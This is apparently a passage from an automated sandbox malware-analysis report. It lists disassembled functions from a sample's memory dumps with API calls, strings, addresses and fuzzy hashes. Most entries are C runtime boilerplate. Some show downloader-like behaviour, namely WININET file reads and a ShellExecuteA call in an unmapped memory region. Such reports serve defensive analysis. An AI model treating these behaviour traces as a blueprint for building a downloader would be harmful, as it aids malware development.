std::_Xinvalid_argument.LIBCPMT ref: 0040511B
std::_Xinvalid_argument.LIBCPMT ref: 00405136
_memmove.LIBCMT ref: 00405189

Part of subcall function 00404850: std::_Xinvalid_argument.LIBCPMT ref: 00404867
Part of subcall function 00404850: std::_Xinvalid_argument.LIBCPMT ref: 0040488A
Part of subcall function 00404850: std::_Xinvalid_argument.LIBCPMT ref: 004048A5
Part of subcall function 00404850: _memmove.LIBCMT ref: 00404906

Strings

AI, xrefs: 004050EE, 004050D9, 004050DD, 004050F4
AI, xrefs: 004050E1, 004050F8
string too long, xrefs: 00405116, 00405131

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long$AI$AI
API String ID: 2168136238-522787289
Opcode ID: 879a16564a0fbb97e7d7988dadfe8fba86ccb2918cca85fb7288835987ba4b80
Instruction ID: 96a635a80482f93c90240997e1b2cfe2770afc11c5e98887d7cf215a33ca5b83
Opcode Fuzzy Hash: 879a16564a0fbb97e7d7988dadfe8fba86ccb2918cca85fb7288835987ba4b80
Instruction Fuzzy Hash: 21312C32710B104BD724AE5CE880A2FF7EAEB96750B50093FF152DB7C0C77998448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00495060, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00495074

Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C80A
Part of subcall function 0049C7F5: __CxxThrowException@8.LIBCMT ref: 0049C81F
Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C830

std::_Xinvalid_argument.LIBCPMT ref: 0049508C
std::_Xinvalid_argument.LIBCPMT ref: 004950A7
_memmove.LIBCMT ref: 00495111

Strings

invalid string position, xrefs: 0049506F
string too long, xrefs: 00495087, 004950A2

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: b536cfc50c2d506f1478a8e5a85e934793372386486e9a70909effe78106291a
Instruction ID: c8a96df3ad3c80595e44ef3f48d0dde9ca919f63da79a99634e0c1c6aabc28fc
Opcode Fuzzy Hash: b536cfc50c2d506f1478a8e5a85e934793372386486e9a70909effe78106291a
Instruction Fuzzy Hash: 6721D7327047104BCB259E5DD881B6FBBE9DB91751B70093FF141C7281CB699C4487AD

Uniqueness

Uniqueness Score: -1.00%

Function 004976C0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00418310: std::locale::_Init.LIBCPMT ref: 00418356
Part of subcall function 00418310: std::_Lockit::_Lockit.LIBCPMT ref: 00418369

Part of subcall function 004193E0: std::_Lockit::_Lockit.LIBCPMT ref: 00419439

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049785C

Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 004181E3
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 0041820C
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 0041822B
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 0041824D
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 0041826C
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 00418289
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 004182A8

Strings

`D@, xrefs: 0049773D
D@, xrefs: 0049779E
E@, xrefs: 004977D8
@M@, xrefs: 004977CB
@~A, xrefs: 00497854

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_std::_$InitIos_base_dtorstd::ios_base::_std::locale::_
String ID: D@$ E@$@M@$@~A$`D@
API String ID: 250614744-3017291392
Opcode ID: 6c2b0ca6476b61b291a444bba2c308648810b7e30a608dd788c55ad31dd38e20
Instruction ID: c9ab070bc47b2b132573dc5aa908d99276ba5f99e6953dedf8a04d594f89d659
Opcode Fuzzy Hash: 6c2b0ca6476b61b291a444bba2c308648810b7e30a608dd788c55ad31dd38e20
Instruction Fuzzy Hash: 1F4117B05183818FD720DF14C485B9BFBE4BB98308F508D2EE59997291DB789548CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 033A4B90, Relevance: 9.3, APIs: 6, Instructions: 305COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 033A4BD2
std::_Xinvalid_argument.LIBCPMT ref: 033A4BF0
std::_Xinvalid_argument.LIBCPMT ref: 033A4D03
std::_Xinvalid_argument.LIBCPMT ref: 033A4D78
std::_Xinvalid_argument.LIBCPMT ref: 033A4D90
std::_Xinvalid_argument.LIBCPMT ref: 033A4DAA

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID:
API String ID: 909987262-0
Opcode ID: 81c53a8ded41cbf8cc3981c6fbc45506ab7021e96f80030de0c228ec78d4db57
Instruction ID: 9076c087a7929b904f97213ea55f72a4241a7e48ca0f2c1fec64e465eb9e6349
Opcode Fuzzy Hash: 81c53a8ded41cbf8cc3981c6fbc45506ab7021e96f80030de0c228ec78d4db57
Instruction Fuzzy Hash: B791D736710B009BD328DE1EDCC0A6EF3EAEF95611B250E2EE096CB781D7A0DC418765

Uniqueness

Uniqueness Score: -1.00%

Function 033B6020, Relevance: 9.3, APIs: 6, Instructions: 263networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 033B6091
InternetReadFile.WININET(?,?,000003E8,?), ref: 033B60B2
_memset.LIBCMT ref: 033B6127
HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 033B613D

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: FileInternet$HttpInfoPointerQueryRead_memset
String ID:
API String ID: 585523124-0
Opcode ID: 86c7869f82345cdfc0b7608d53c3c14cbb5e9feede601a5bd135100b892aaac3
Instruction ID: 3c83c35d63560dd857a1e1fcd31c5553e49b7d8bbad6b43279e92f44c31ab895
Opcode Fuzzy Hash: 86c7869f82345cdfc0b7608d53c3c14cbb5e9feede601a5bd135100b892aaac3
Instruction Fuzzy Hash: 8BA18DB19087409FD360DF29C984E6BB7E8FF89704F404A2EF58A8B651D734E804CB66

Uniqueness

Uniqueness Score: -1.00%

Function 034353A0, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 034353CC
std::_Lockit::_Lockit.LIBCPMT ref: 034353F2
std::bad_exception::bad_exception.LIBCMT ref: 0343547A
__CxxThrowException@8.LIBCMT ref: 03435489
std::_Lockit::_Lockit.LIBCPMT ref: 0343549E
std::locale::facet::_Facet_Register.LIBCPMT ref: 034354B9

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID:
API String ID: 2427920155-0
Opcode ID: ffed7d8bcb85b0bbe8f07397fd8880bc1e70bbbff185f4e6e1828da45a1b0dfb
Instruction ID: 2a83e8ae8fab1d1a21385e05fb3fa4fd55d811553388e4df1fe72d75d8f1d19a
Opcode Fuzzy Hash: ffed7d8bcb85b0bbe8f07397fd8880bc1e70bbbff185f4e6e1828da45a1b0dfb
Instruction Fuzzy Hash: FC31D3355053009FC718DF25D880B5AB7E4FB6B324F440AAFE4569F2D0D730A804CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 033B96F0, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 033B971C
std::_Lockit::_Lockit.LIBCPMT ref: 033B9742
std::bad_exception::bad_exception.LIBCMT ref: 033B97CA
__CxxThrowException@8.LIBCMT ref: 033B97D9
std::_Lockit::_Lockit.LIBCPMT ref: 033B97EE
std::locale::facet::_Facet_Register.LIBCPMT ref: 033B9809

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID:
API String ID: 2427920155-0
Opcode ID: 7cd23927a10f08ac214474c197d7eca163e4b1c6faae5de1849a991c32d5d5e0
Instruction ID: 3aae09a7a96adb7443ed73d8d4c0d049245d31b4d6e7507fb78311d269d37071
Opcode Fuzzy Hash: 7cd23927a10f08ac214474c197d7eca163e4b1c6faae5de1849a991c32d5d5e0
Instruction Fuzzy Hash: 1931A0395043009FC714EF24DCD1B9AB7F4BB49720F540A6EF656AB6A0DB34A844CB86

Uniqueness

Uniqueness Score: -1.00%

Function 033B90C0, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 033B90EC
std::_Lockit::_Lockit.LIBCPMT ref: 033B9112
std::bad_exception::bad_exception.LIBCMT ref: 033B919A
__CxxThrowException@8.LIBCMT ref: 033B91A9
std::_Lockit::_Lockit.LIBCPMT ref: 033B91BE
std::locale::facet::_Facet_Register.LIBCPMT ref: 033B91D9

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID:
API String ID: 2427920155-0
Opcode ID: 76acf0189cdbd01fd60682db51ffaeeb1b45a871c2c3086ce1ecd9507ee6f833
Instruction ID: 2ff00c8fd6f3a9b554ff3dc1b5335aef0f5a03294c282b0da47719f1ff7c5930
Opcode Fuzzy Hash: 76acf0189cdbd01fd60682db51ffaeeb1b45a871c2c3086ce1ecd9507ee6f833
Instruction Fuzzy Hash: A331F3755053418FC714EF14DCD4BAAB7F8FB49720F44066EE652AB6E0DB34A808CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004A3471, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004A3499

Part of subcall function 0049E31C: __getptd.LIBCMT ref: 0049E32A
Part of subcall function 0049E31C: __getptd.LIBCMT ref: 0049E338

__getptd.LIBCMT ref: 004A34A3

Part of subcall function 004A64DD: __getptd_noexit.LIBCMT ref: 004A64E0
Part of subcall function 004A64DD: __amsg_exit.LIBCMT ref: 004A64ED

__getptd.LIBCMT ref: 004A34B1
__getptd.LIBCMT ref: 004A34BF
__getptd.LIBCMT ref: 004A34CA
_CallCatchBlock2.LIBCMT ref: 004A34F0

Part of subcall function 0049E3C1: __CallSettingFrame@12.LIBCMT ref: 0049E40D

Part of subcall function 004A3597: __getptd.LIBCMT ref: 004A35A6
Part of subcall function 004A3597: __getptd.LIBCMT ref: 004A35B4

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 520f4fb9ee74b150e1340aeaa20846ca5d3e847d4cf5b1ebc0ecd26ea85ae11f
Instruction ID: 16e33c54cc596a21195551199751a05588ab15f8cfd76d485d0155a01e8bbba0
Opcode Fuzzy Hash: 520f4fb9ee74b150e1340aeaa20846ca5d3e847d4cf5b1ebc0ecd26ea85ae11f
Instruction Fuzzy Hash: 5D11D7B1C00209EFDF00EFA5D445BAEBBB0FF19319F1584AAF814A7251DB789A119F58

Uniqueness

Uniqueness Score: -1.00%

Function 034436C1, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 034436E9

Part of subcall function 0343E56C: __getptd.LIBCMT ref: 0343E57A
Part of subcall function 0343E56C: __getptd.LIBCMT ref: 0343E588

__getptd.LIBCMT ref: 034436F3

Part of subcall function 0344672D: __getptd_noexit.LIBCMT ref: 03446730
Part of subcall function 0344672D: __amsg_exit.LIBCMT ref: 0344673D

__getptd.LIBCMT ref: 03443701
__getptd.LIBCMT ref: 0344370F
__getptd.LIBCMT ref: 0344371A
_CallCatchBlock2.LIBCMT ref: 03443740

Part of subcall function 0343E611: __CallSettingFrame@12.LIBCMT ref: 0343E65D

Part of subcall function 034437E7: __getptd.LIBCMT ref: 034437F6
Part of subcall function 034437E7: __getptd.LIBCMT ref: 03443804

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 520f4fb9ee74b150e1340aeaa20846ca5d3e847d4cf5b1ebc0ecd26ea85ae11f
Instruction ID: 208c9f5e75ba5b77e689867a556ccf9aaeeb616528cf86ec9050ef6c07ee116f
Opcode Fuzzy Hash: 520f4fb9ee74b150e1340aeaa20846ca5d3e847d4cf5b1ebc0ecd26ea85ae11f
Instruction Fuzzy Hash: 5711DAB9C00309DFEB00EFA5D545BADBBB0FF09314F11806AE954AF250DB399A519F54

Uniqueness

Uniqueness Score: -1.00%

Function 004A7FB5, Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004A7FC1

Part of subcall function 004A64DD: __getptd_noexit.LIBCMT ref: 004A64E0
Part of subcall function 004A64DD: __amsg_exit.LIBCMT ref: 004A64ED

__amsg_exit.LIBCMT ref: 004A7FE1
__lock.LIBCMT ref: 004A7FF1
InterlockedDecrement.KERNEL32(?), ref: 004A800E
_free.LIBCMT ref: 004A8021
InterlockedIncrement.KERNEL32(03761620), ref: 004A8039

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 86b1b4b5d7dc3b35ca6b195787b803f7ddf73829b7d6e51916751d1c5774749b
Instruction ID: 48377658496cdb589256da4fcf29d306702c74964e6a1b73f9063b027c6dabde
Opcode Fuzzy Hash: 86b1b4b5d7dc3b35ca6b195787b803f7ddf73829b7d6e51916751d1c5774749b
Instruction Fuzzy Hash: EA01ED31D05A20ABCB20AF66A80175E77A0EB26724F01402FF814A7380CB7C6941CFDD

Uniqueness

Uniqueness Score: -1.00%

Function 00494AF0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 00494B20

Part of subcall function 004A14BB: __getptd.LIBCMT ref: 004A14BB

Strings

true, xrefs: 00494BAC
,, xrefs: 00494C00
., xrefs: 00494BF7
false, xrefs: 00494B82

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd_localeconv
String ID: ,$.$false$true
API String ID: 1421026308-4283260876
Opcode ID: e7a07b9530a2a1e5014c3b8e11c9c0cf6cb055bd090aca3d7e6f223ca4b9c345
Instruction ID: a998821dfd07f9e4f20d011b850abed42d941325e2282a269f30593af82db12f
Opcode Fuzzy Hash: e7a07b9530a2a1e5014c3b8e11c9c0cf6cb055bd090aca3d7e6f223ca4b9c345
Instruction Fuzzy Hash: 52316C75D082808BCF01DF68D485B56BFA09F86318F1884BFD8558F307D639D905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 03434D40, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 03434D70

Part of subcall function 0344170B: __getptd.LIBCMT ref: 0344170B

Strings

., xrefs: 03434E47
false, xrefs: 03434DD2
true, xrefs: 03434DFC
,, xrefs: 03434E50

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __getptd_localeconv
String ID: ,$.$false$true
API String ID: 1421026308-4283260876
Opcode ID: 81f5d560cbf85b7afa5a7bddc056bfae377c161c5fd04af55080e7f8818b9a5e
Instruction ID: e08a8634bd5383202e8f9f44bec1071b0ab69b8c5daa8d903f4a3377069c1506
Opcode Fuzzy Hash: 81f5d560cbf85b7afa5a7bddc056bfae377c161c5fd04af55080e7f8818b9a5e
Instruction Fuzzy Hash: AA31097AD093809FCB15DF69A4806AABFA49F4F210F1884BFD8958F341D635C905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403730, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040374A

Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C80A
Part of subcall function 0049C7F5: __CxxThrowException@8.LIBCMT ref: 0049C81F
Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C830

std::_Xinvalid_argument.LIBCPMT ref: 00403789

Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7BD
Part of subcall function 0049C7A8: __CxxThrowException@8.LIBCMT ref: 0049C7D2
Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7E3

_memmove.LIBCMT ref: 004037F1

Strings

invalid string position, xrefs: 00403745
string too long, xrefs: 00403784

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 4bc4689a73a9327a094fdebc0896bc287f6a946ac199d90ae178c5d99dcec0e5
Instruction ID: 07414fe016248ecb867ebee8fa264d8b16c581537b9bfd6b8c73e70a1ff0aa6e
Opcode Fuzzy Hash: 4bc4689a73a9327a094fdebc0896bc287f6a946ac199d90ae178c5d99dcec0e5
Instruction Fuzzy Hash: 9231C4B33043148BC7209E5CE8C092AF7ADEFD5762710497FF512D7280EB36A9008769

Uniqueness

Uniqueness Score: -1.00%

Function 00403640, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040365A

Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C80A
Part of subcall function 0049C7F5: __CxxThrowException@8.LIBCMT ref: 0049C81F
Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C830

std::_Xinvalid_argument.LIBCPMT ref: 00403696

Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7BD
Part of subcall function 0049C7A8: __CxxThrowException@8.LIBCMT ref: 0049C7D2
Part of subcall function 0049C7A8: std::exception::exception.LIBCMT ref: 0049C7E3

_memmove.LIBCMT ref: 004036F7

Strings

invalid string position, xrefs: 00403655
string too long, xrefs: 00403691

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 22734225d7a3b25b94882d40e8e3dec73d72a1a1b81fadde2ed1d31f0e1e8e0d
Instruction ID: 4722b15156880537cb7ce8eac4b1e85cd7e6d348c72860c46e5ba6bbd597cdb7
Opcode Fuzzy Hash: 22734225d7a3b25b94882d40e8e3dec73d72a1a1b81fadde2ed1d31f0e1e8e0d
Instruction Fuzzy Hash: 2D21C5723002149BC7309E5CA880B6AFB9D9BE1766F20097FF151DB381DB7A9D4087A9

Uniqueness

Uniqueness Score: -1.00%

Function 00418920, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041894E
std::exception::exception.LIBCMT ref: 0041898D

Part of subcall function 0049D92E: std::exception::_Copy_str.LIBCMT ref: 0049D949

__CxxThrowException@8.LIBCMT ref: 004189A4

Part of subcall function 0049DFF1: RaiseException.KERNEL32(#3@,?,5EBFF6FD,004BD94C,00403323,?,004CDB30,?,5EBFF6FD), ref: 0049E033

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004189AB

Strings

bad locale name, xrefs: 00418985

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 73090415-1405518554
Opcode ID: 2ec8270fd6705c48a955d560b4f1a5fdb5ca6178796cfce063d38611fd4f3613
Instruction ID: 6f07151df6e15eb5fd4cd9c120194aa37d7e3a8d865b3e488a77aca032a60faa
Opcode Fuzzy Hash: 2ec8270fd6705c48a955d560b4f1a5fdb5ca6178796cfce063d38611fd4f3613
Instruction Fuzzy Hash: F0118FB14187809FC310DF29C881A47FBE4FB58714F408A6FF49993741D738A508CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00494630, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00494637

Part of subcall function 0049F64E: __FF_MSGBANNER.LIBCMT ref: 0049F667
Part of subcall function 0049F64E: __NMSG_WRITE.LIBCMT ref: 0049F66E
Part of subcall function 0049F64E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A212E,00000000,00000001,00000000,?,004A8BC4,00000018,004D18E0,0000000C,004A8C54), ref: 0049F693

GetTickCount.KERNEL32 ref: 00494644

Part of subcall function 004A1488: __getptd.LIBCMT ref: 004A148D

_rand.LIBCMT ref: 00494660

Part of subcall function 004A149A: __getptd.LIBCMT ref: 004A149A

_sprintf.LIBCMT ref: 00494675

Strings

%s%d, xrefs: 0049466F

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: d60f38720ba14f3c02c3ebe1df44cbcfe957b40b2b4d1a38e2327da34b18299f
Instruction ID: 5514f54cc74ebf83bca8353edb73af564ecdd8901d5befa72f1610bb39044888
Opcode Fuzzy Hash: d60f38720ba14f3c02c3ebe1df44cbcfe957b40b2b4d1a38e2327da34b18299f
Instruction Fuzzy Hash: 0DF096D270025157DB11A6AE9C45E97AE488BB2355F14447FF14487212E9698C1083BA

Uniqueness

Uniqueness Score: -1.00%

Function 0343E1C1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0343E1DB

Part of subcall function 0343F89E: __FF_MSGBANNER.LIBCMT ref: 0343F8B7
Part of subcall function 0343F89E: __NMSG_WRITE.LIBCMT ref: 0343F8BE
Part of subcall function 0343F89E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0343F8E3

std::exception::exception.LIBCMT ref: 0343E210
std::exception::exception.LIBCMT ref: 0343E22A
__CxxThrowException@8.LIBCMT ref: 0343E23B

Strings

0@, xrefs: 0343E1F3

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 0@
API String ID: 615853336-1855383697
Opcode ID: 4309afd4dad9414781cd96fcdb960240d0bff31a02817935b0c99f8053a46b09
Instruction ID: 1206062dee4a66ecc364dd65e25495316e1130b884623ddc063558231cf669ac
Opcode Fuzzy Hash: 4309afd4dad9414781cd96fcdb960240d0bff31a02817935b0c99f8053a46b09
Instruction Fuzzy Hash: 7AF0D63AD012096ADB54EF19DC00AAE7B68AB4B314F19406FE400AF2D0DBB48A44875C

Uniqueness

Uniqueness Score: -1.00%

Function 004A31AE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004A31CF

Part of subcall function 004A64DD: __getptd_noexit.LIBCMT ref: 004A64E0
Part of subcall function 004A64DD: __amsg_exit.LIBCMT ref: 004A64ED

__getptd.LIBCMT ref: 004A31E0
__getptd.LIBCMT ref: 004A31EE

Strings

MOC, xrefs: 004A31C1
RCC, xrefs: 004A31BA

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC
API String ID: 803148776-2084237596
Opcode ID: b1bbe44ff54bde19c51d4256c27e1c908a71b64fc5c6ce829d285814e0e4f12e
Instruction ID: c6723bc3b1f0e055ec5b672d46ad5861ea1525dcbbb7b3fd2c1f59f0190af40b
Opcode Fuzzy Hash: b1bbe44ff54bde19c51d4256c27e1c908a71b64fc5c6ce829d285814e0e4f12e
Instruction Fuzzy Hash: E5E012305041049FC710AF65D04A77933D4AB6A719F5F45A7F40DC7322E72DDA904A5A

Uniqueness

Uniqueness Score: -1.00%

Function 033A5630, Relevance: 7.7, APIs: 5, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 033B5A60: _memset.LIBCMT ref: 033B5A6B
Part of subcall function 033B5A60: _strcpy_s.LIBCMT ref: 033B5A82
Part of subcall function 033B5A60: _memset.LIBCMT ref: 033B5AA1

_memset.LIBCMT ref: 033A56A0
_memset.LIBCMT ref: 033A56B3
_strtok.LIBCMT ref: 033A56E3
ShellExecuteA.SHELL32(00000000,00000000,?,004BD954,00000000,00000000), ref: 033A586D
_strtok.LIBCMT ref: 033A5882

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: _memset$_strtok$ExecuteShell_strcpy_s
String ID:
API String ID: 3931440415-0
Opcode ID: 593ffaaab60b68dd800807947a346de75cd2612ed44cce7c635ae58455b42b44
Instruction ID: 83a345acd105302edd6892341f060a695b0ada1d9d553247f84468b4b436fd0d
Opcode Fuzzy Hash: 593ffaaab60b68dd800807947a346de75cd2612ed44cce7c635ae58455b42b44
Instruction Fuzzy Hash: 88716FB65183849FE325DB68C884EABB7ECEF96300F44492EF1C54B250EB759548CB63

Uniqueness

Uniqueness Score: -1.00%

Function 004A047C, Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A04D7
_memcpy_s.LIBCMT ref: 004A0548
__read.LIBCMT ref: 004A05AB
__filbuf.LIBCMT ref: 004A05C7

Part of subcall function 004A3E4D: __getptd_noexit.LIBCMT ref: 004A3E4D

_memset.LIBCMT ref: 004A0608

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 4e00f1fe714cd42e63a1dcb89493bd1765b1eb3e5385399f54715972ecb77ebb
Instruction ID: dc17c951de501dc672a5239cd9738f012d6b2f18b8f45dd88f79bb3926a627f9
Opcode Fuzzy Hash: 4e00f1fe714cd42e63a1dcb89493bd1765b1eb3e5385399f54715972ecb77ebb
Instruction Fuzzy Hash: 7E51E330E00305EBDB24DF69884469FB7B1BFA6324F24862BE82596291D778DE51CF49

Uniqueness

Uniqueness Score: -1.00%

Function 034406CC, Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03440727
_memcpy_s.LIBCMT ref: 03440798
__read.LIBCMT ref: 034407FB
__filbuf.LIBCMT ref: 03440817

Part of subcall function 0344409D: __getptd_noexit.LIBCMT ref: 0344409D

_memset.LIBCMT ref: 03440858

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 4bfd91d246ba3ef3721e7c459de1a943f12eade2db229b49d58e8a67abc21f87
Instruction ID: 70a2cd7ed2353534d94f5b27217e7bdd43c2e8bcf0b1e9b5da04728c0ab514e3
Opcode Fuzzy Hash: 4bfd91d246ba3ef3721e7c459de1a943f12eade2db229b49d58e8a67abc21f87
Instruction Fuzzy Hash: B651B635A00305EFEB24DFB98A4469FF7B1AF40320F18867BE9255E290D7309961CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0343FA05, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0343FA13

